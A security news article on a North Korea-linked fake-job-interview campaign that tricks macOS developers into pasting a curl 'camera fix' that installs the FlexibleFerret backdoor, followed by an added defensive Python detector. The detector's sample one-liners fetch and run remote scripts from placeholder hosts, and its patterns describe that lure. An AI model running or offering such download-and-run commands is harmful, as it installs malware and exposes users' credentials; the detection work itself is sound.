- Jamf reports that North Korean actors are using fake job ads and ClickFix tactics to target macOS users.
- Victims are tricked into running Curl commands in a terminal and installing the FlexibleFerret backdoor malware.
- The campaign, called Contagious Interview, allows for credential theft, file exfiltration and system hacking.
State-sponsored North Korean attackers are targeting macOS users with new malware, using a strategy that combines two popular approaches – fake job postings and ClickFix, experts warn.
Jamf security researchers confirmed they found attacks in the wild that use ClickFix, an attack method in which the victim is presented with a false problem and, at the same time, given a fix for it. It's an evolution of the old “You have a virus” pop-up that dominated the Internet in the early 2000s.
Jamf says that “DPRK-linked operators” behind the FlexibleFerret malware family are creating fake companies, fake LinkedIn profiles and, most importantly, fake job advertisements as part of a broader campaign called Contagious Interview.
Curl commands and false fixes
The victims, mostly software developers, either found these websites and job postings themselves or were invited to interviews through LinkedIn.
After a few rounds, victims are asked to record themselves on video through the employer's platform, but when they try to do so, the platform tells them that their camera is not working properly.
They will then be given a fix – a Curl command to enter into the Terminal – which does not fix the problem, but rather introduces malware into the system.
This malware, essentially a backdoor, does several things: it generates a short computer ID, checks for duplicates, and then retrieves additional commands from a hard-coded command-and-control server.
These commands include collecting system information, uploading or downloading files, executing shell commands, obtaining Chrome profile information, or triggering automated credential theft.
“Organizations should treat unwanted terminal-based ‘interview’ ratings and ‘fix’ instructions as a high risk and ensure that users know to stop and report these prompts rather than follow them,” the researchers concluded.
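A defender-side check for the lure described above, as an added example that is not from Jamf's report or the original article: it flags pasted one-liners in which curl output is piped to a shell, run through command substitution, or saved to a file that is then executed. The sample commands, the `example.invalid` hosts and all function names are constructed for illustration.

```python
import os
import re
import shlex

SHELLS = {"sh", "bash", "zsh"}
OPERATORS = {"|", "||", "&&", ";", "&"}
OUTPUT_FLAG = re.compile(r"--output|-[A-Za-z]*o")  # -o, --output, or a cluster like -fsSLo

def split_stages(cmd):
    """Tokenise a shell one-liner into (operator_before, argv) stages."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    stages = [[None, []]]
    for tok in lex:
        if tok in OPERATORS:
            stages.append([tok, []])
        else:
            stages[-1][1].append(tok)
    return [(op, argv) for op, argv in stages if argv]

def findings(cmd):
    """Reasons a pasted one-liner looks like a download-and-run 'fix'."""
    try:
        stages = split_stages(cmd)
    except ValueError:  # unbalanced quotes: report rather than guess
        return ["unparseable"]
    hits, downloaded, prev = [], set(), ""
    for op, argv in stages:
        prog = argv[1] if argv[0] == "sudo" and len(argv) > 1 else argv[0]
        name = os.path.basename(prog)
        if name in SHELLS and op == "|" and prev == "curl":
            hits.append("curl-piped-to-shell")
        if name in SHELLS and any("$(" in a and "curl" in a for a in argv):
            hits.append("shell-runs-curl-substitution")
        if name == "curl":  # remember where curl was told to save its download
            downloaded.update(v for f, v in zip(argv, argv[1:]) if OUTPUT_FLAG.fullmatch(f))
        elif downloaded & set(argv) and (name in SHELLS or prog in downloaded):
            hits.append("downloaded-file-executed")
        prev = name
    return hits

# Constructed sample one-liners (not taken from the Jamf report).
SAMPLES = [
    "curl -fsSL https://updates.example.invalid/camera-fix.sh | bash",
    "curl -s -o /tmp/camfix https://updates.example.invalid/camfix && chmod +x /tmp/camfix && /tmp/camfix",
    'zsh -c "$(curl -fsSL https://updates.example.invalid/driver.sh)"',
    "curl -I https://example.invalid/health",
    "curl -sS https://api.example.invalid/v1/status | jq .state",
]
```

Run `findings()` over shell history or process telemetry command lines; an empty list means none of the three patterns matched, not that the command is safe.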